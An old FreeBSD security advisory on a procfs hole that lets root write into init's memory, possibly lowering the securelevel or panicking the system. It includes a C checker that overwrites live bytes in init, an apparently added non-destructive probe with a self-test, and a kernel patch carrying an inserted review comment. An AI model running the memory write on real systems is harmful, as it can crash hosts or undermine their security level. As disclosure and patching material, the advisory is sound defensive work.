9th Sep 1997 [SBWID-186]
COMMAND
	    procfs
SYSTEMS AFFECTED
	    FreeBSD
PROBLEM
	    Brian Mitchell posted the following. There is a slight procfs hole
	    that could allow an intruder to lower the securelevel. init's
	    memory is not protected, so you can overwrite data/instructions
	    in init and possibly lower the securelevel (although panicking the
	    system is much more likely). Enclosed is a vulnerability checker:
	
	    #include <stdio.h>
	    #include <stdlib.h>
	    #include <unistd.h>
	    #include <sys/types.h>
	    #include <fcntl.h>

	    int main(void)
	    {
	            int tqbf=31337;         /* value written into init's memory */
	            int fd;
	            int g0nz0;              /* result of the write() attempt */

	            /* /proc/1/mem is only writable by root in the first place */
	            if(getuid())
	            {
	                    fprintf(stderr, "this attack needs root\n");
	                    exit(1);
	            }
	            fd = open("/proc/1/mem", O_RDWR);
	            if(fd < 0)
	            {
	                    fprintf(stderr, "open of /proc/1/mem failed\n");
	                    exit(2);
	            }
	            /* try to overwrite four bytes at offset 0x1000 of init's
	             * address space; a fixed kernel refuses with EPERM */
	            lseek(fd, 0x1000, SEEK_SET);
	            g0nz0=write(fd, &tqbf, sizeof(int));
	            close(fd);
	            if(g0nz0 >= 0)
	                    fprintf(stderr, "procfs is vulnerable!\n");
	            else
	                    fprintf(stderr, "procfs is not vulnerable!\n");
	            printf("returned %d\n", g0nz0);
	            return 0;
	    }
	
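The checker above overwrites live bytes in init, which is exactly the "panicking the system" outcome the post warns about. Below is an added, non-destructive variant of the same test (it is not Brian Mitchell's code and not part of the original advisory): it reads a few bytes from the mem node and writes the identical bytes back, so a kernel with the securelevel check answers EPERM while an unfixed kernel accepts the write without changing anything. The node path, offset, length and the `probe_mem_write`/`selftest` names are assumptions of this example; `selftest` exercises the probe against an ordinary temporary file so the logic can be checked on any host.

```c
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

/* Outcome of one probe (hypothetical names for this example). */
enum probe_result {
    PROBE_WRITE_ACCEPTED = 0,   /* write went through: hole is open */
    PROBE_WRITE_REFUSED  = 1,   /* EPERM on write: securelevel check present */
    PROBE_OPEN_FAILED    = -1,  /* node could not be opened read/write */
    PROBE_IO_ERROR       = -2   /* seek/read failed or short transfer */
};

/* Read `len` bytes at `off` from `path`, then write the same bytes back.
 * Memory content is never altered; only the kernel's answer is observed.
 * Uses lseek()+read()/write(), which the 1997-era procfs node supports. */
int probe_mem_write(const char *path, off_t off, size_t len)
{
    unsigned char buf[64];
    int fd, saved;
    ssize_t n;

    if (len > sizeof buf) len = sizeof buf;
    fd = open(path, O_RDWR);
    if (fd < 0) return PROBE_OPEN_FAILED;
    if (lseek(fd, off, SEEK_SET) != off || read(fd, buf, len) != (ssize_t)len) {
        close(fd);
        return PROBE_IO_ERROR;
    }
    if (lseek(fd, off, SEEK_SET) != off) { close(fd); return PROBE_IO_ERROR; }
    n = write(fd, buf, len);
    saved = errno;
    close(fd);
    if (n == (ssize_t)len) return PROBE_WRITE_ACCEPTED;
    if (n < 0 && saved == EPERM) return PROBE_WRITE_REFUSED;
    return PROBE_IO_ERROR;
}

/* Self-test on a constructed temporary file standing in for the mem node:
 * the write must be accepted and the file content must be unchanged.
 * Returns 1 on success, 0 on any failure. */
int selftest(void)
{
    static const char sample[] = "init-memory-sample";   /* constructed data */
    char tmpl[] = "/tmp/probeXXXXXX";
    char back[sizeof sample];
    int fd, ok = 0;

    fd = mkstemp(tmpl);
    if (fd < 0) return 0;
    if (write(fd, sample, sizeof sample) == (ssize_t)sizeof sample) {
        close(fd);
        if (probe_mem_write(tmpl, 4, 8) == PROBE_WRITE_ACCEPTED &&
            probe_mem_write(tmpl, 100, 8) == PROBE_IO_ERROR) {
            fd = open(tmpl, O_RDONLY);
            if (fd >= 0 && read(fd, back, sizeof back) == (ssize_t)sizeof back &&
                memcmp(back, sample, sizeof sample) == 0)
                ok = 1;
        }
    }
    if (fd >= 0) close(fd);
    unlink(tmpl);
    return ok;
}

int main(void)
{
    /* same node and offset as the original checker, but read-then-rewrite */
    int r = probe_mem_write("/proc/1/mem", 0x1000, sizeof(int));
    switch (r) {
    case PROBE_WRITE_ACCEPTED: puts("procfs is vulnerable (write accepted)"); break;
    case PROBE_WRITE_REFUSED:  puts("procfs refused the write (EPERM)"); break;
    case PROBE_OPEN_FAILED:    puts("could not open /proc/1/mem read/write"); break;
    default:                   puts("probe failed before the write was attempted");
    }
    return r == PROBE_WRITE_ACCEPTED ? 1 : 0;
}
```

Run it as root on the box under test; a non-zero exit means the write was accepted. Because the bytes written are the ones just read, an unfixed kernel is left exactly as it was, which is the behaviour you want from a check that is run on production systems.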
SOLUTION
	    Here is a simple patch; it disallows writes to pid 1's mem node if
	    securelevel is > 0 (the diff is based on a 2.2.1 box with the
	    securelevel fix applied):
	
	    *** procfs_mem.c        Sat Sep  6 02:36:39 1997
	    --- procfs_mem.c.new    Sat Sep  6 02:38:25 1997
	    ***************
	    *** 316,321 ****
	    --- 316,325 ----
	                !(curp->p_cred->pc_ucred->cr_gid == KMEM_GROUP &&
	                  uio->uio_rw == UIO_READ))
	                    return EPERM;
	    +
	    +       /* writing to init memory while securelevel > 0 is bad */
	    +       if(uio->uio_rw == UIO_WRITE && p->p_pid == 1 && securelevel > 0)
	    +               return EPERM;
	            error = procfs_rwmem(p, uio);
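	    Review bot: the new guard keys init on the literal `p->p_pid == 1`; a comment naming it as the init process (or a constant) would make the intent visible to the next reader, since nothing else on these lines says why pid 1 is special. The placement is right: the test sits before `error = procfs_rwmem(p, uio);`, so no bytes reach init's address space before the securelevel comparison. Note also that the guard refuses every write to pid 1 once securelevel > 0, not only writes that would touch securelevel-related code, which is the safe choice here because this layer cannot tell those apart; writes at securelevel 0 remain allowed, matching the stated scope of the fix.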
	
	
